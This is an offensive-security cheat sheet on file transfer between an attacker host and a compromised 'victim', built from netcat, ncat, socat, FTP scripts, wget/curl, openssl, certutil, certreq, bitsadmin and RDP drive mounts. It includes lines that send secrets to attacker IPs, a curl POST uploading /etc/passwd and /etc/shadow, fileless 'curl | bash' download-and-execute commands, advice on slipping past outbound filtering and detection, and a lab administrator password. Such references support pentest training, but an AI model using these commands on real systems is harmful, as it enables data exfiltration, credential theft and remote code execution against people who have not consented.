Binaries
Useful binaries for transferring files.
These binaries may not always exist on the target however we can still use them on the attacker host and receive them with something like bash.
For this to work, the
netcat
binary needs to be installed on both systems.# Set up a listener on the system you want to receive the file, specify a file name
└─$ nc -nvlp 4444 > mysecrets.txt
listening on [any] 4444 ...
# Send the file to the listening system, specifying the file to send
└─$ nc -nv 10.10.14.86 4444 < mysecrets.txt
# Another option that ends the connection after the file is fully sent
└─$ nc -q 0 10.10.14.86 4444 < mysecrets.txt
# The listening system should see this, exit out and view the file
└─$ nc -nvlp 4444 > mysecrets.txt
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 43222
# View the file
└─$ cat mysecrets.txt
42
In case the victim restricts outbound traffic, we can use a port that is already open and may have fewer restrictions such as
443
# On the attacker, set up a listener and prepare a file to send
└─$ sudo nc -nvlp 443 -q 0 < test
# On the victim, connect to the attacker and download the file
└─$ nc 192.168.127.134 443 > test
Not to be confused with
netcat
/ nc
. This updated version supports more features like SSL, SOCKS, HTTP proxies, and more.# On the target, Set up a listner to receive the file, test
ncat -nvlp 8000 --recv-only > test
# On the attacker, Send the file test to the remote host
ncat 192.168.127.134 8000 --send-only < test
In case the victim restricts outbound traffic, we can use a port that is already open and may have fewer restrictions such as
443
# On the attacker, set up a listener and prepare a file to send
sudo ncat -nvlp 443 --send-only < test
# On the victim, connect to the attacker and download the file
ncat 192.168.127.134 443 --recv-only > test
For this to work, the
socat
binary needs to be installed on both systems.# Set up a listener on the system. Specify the file to send after a connection is made.
└─$ sudo socat TCP4-LISTEN:443,fork file:mysecrets.txt
# Connect to the listening system to download the file.
└─$ socat TCP4:10.10.14.86:443 file:received_mysecrets.txt,create
# View the file
└─$ cat received_mysecrets.txt
42
This is a useful solution when not having an interactive shell on our victim. We can echo FTP commands into a file and then use the FTP client to send them to the FTP server.
# Echo the commands into a file
C:\Users\victim> echo open 192.168.127.134
C:\Users\victim> echo USER anonymous
C:\Users\victim> echo binary
C:\Users\victim> echo PUT C:\Users\victim\windowsFile # upload a file
C:\Users\victim> echo GET /linuxfile # download a file
C:\Users\victim> echo bye
# Send the commands to the remote FTP server
C:\Users\victim> ftp -v -n -s:ftpcommand.txt
Warning. These will download the file to the machine possibly leading to detection.
# Download a file
wget http://10.10.14.86/whoami.exe -o whoami.exe
# Download from web
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh
Fileless download. Execute it directly by piping into bash, python, etc.
# Download and immediately execute
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
Hello, World!
Warning. These will download the file to the machine possibly leading to detection.
# Download a file
curl http://10.10.14.86/whoami.exe -o whoami.exe
# Download from web
curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Fileless download. Execute it directly by piping into bash, python, etc.
# Download and immediately execute
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
Upload example.
# Upload multiple files. Use --insecure if connecting to an untrusted server (e.g., self-signed)
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
This requires SSH to be enabled.
# Download remote file to local host
scp remote-user@remote-host-ip:/path/to/file /local/path
# Upload local file to remote host
scp whoami.exe remote-user@remote-host-ip:/path/to/place/file
# Generate a certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# Start the server
openssl s_server -quiet -accept 443 -cert certificate.pem -key key.pem < <nameOfFileToSend>
# Connect to the server and download the file
openssl s_client -connect 10.10.15.139:443 -quiet > <nameOfFileToReceive>
# If any errors here e.g., "verify error:num=18:self-signed certificate" it's due to
# the info added during the certificate generation. Leaving those items blank (.)
# resolves this e.g., "Email Address []:."
This is available on windows.
** This requires hosting the file on Kali
# Download file.
certutil -split -f -urlcache http://10.10.14.16/winPEASx86.exe <optionalNewFileName>
Available on Windows.
** Not every version supports the
-Post
parameter** Requires a listener to be set up on kali
# Upload a file to target
certreq.exe -Post -config http://<KALI IP>/ .\secrets.txt
** Requires hosting the file with an HTTP or SMB server on Kali
# Download file.
bitsadmin /transfer mytransferjob http://10.10.15.139/exploit C:\Users\user\Downloads\exploit
With rdesktop, we can copy/paste between hosts but we can also mount a local folder and expose it to the RDP session. This folder is only exposed to this one RDP session.
The below command also starts the RDP session.
# On the linux attacker
rdesktop 192.168.127.134 -d coffee.lab -u administrator -p 'javaExpress1!' -r disk:linux='/home/kali/rdesktop/'
# On the windows victim, go to this path in explorer
\\tsclient\
With xfreerdp, we can copy/paste between hosts but we can also mount a local folder and expose it to the RDP session. This folder is only exposed to this one RDP session.
The below command also starts the RDP session.
# On the linux attacker
xfreerdp /v:192.168.127.134 /d:coffee.lab /u:administrator /p:'javaExpress1!' /drive:linux,/home/kali/xfreerdp
# On the windows victim, go to this path in explorer
\\tsclient\
Last modified 6mo ago